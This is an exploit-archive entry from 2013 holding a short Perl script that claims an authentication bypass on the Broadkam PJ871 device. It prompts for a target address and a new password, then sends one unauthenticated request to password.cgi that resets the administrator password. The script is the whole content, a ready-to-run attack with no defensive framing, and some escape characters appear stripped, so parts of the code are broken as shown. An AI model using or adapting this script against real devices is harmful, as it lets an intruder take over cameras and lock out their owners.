[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Broadkam PJ871 Authentication Bypass
# Published : 2013-07-27
# Author :
# Previous Title : WiFly 1.0 Pro iOS - Multiple Vulnerabilities
# Next Title : TRENDnet TE100-P1U Print Server Firmware 4.11 Authentication Bypass Vulnerability


#!/usr/bin/perl
#d3c0der


use HTTP::Request;
use LWP::UserAgent;

 

print "= Target : ";
$ip=<STDIN>;
chomp $ip;
print "= new password : ";
$npass=<STDIN>;
chomp $npass;

if ( $ip !~ /^http:/ ) {
$ip = 'http://' . $ip;
}
if ( $ip !~ //$/ ) {
$ip = $ip . '/';
}
print "n";

print "->attacking , plz wait ! : $ipn";
 

 

@path1=("password.cgi?sysPassword=$npass");

foreach $ways(@path1){

$final=$ip.$ways;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

 
}
 
print "[-] password changed to $npass n";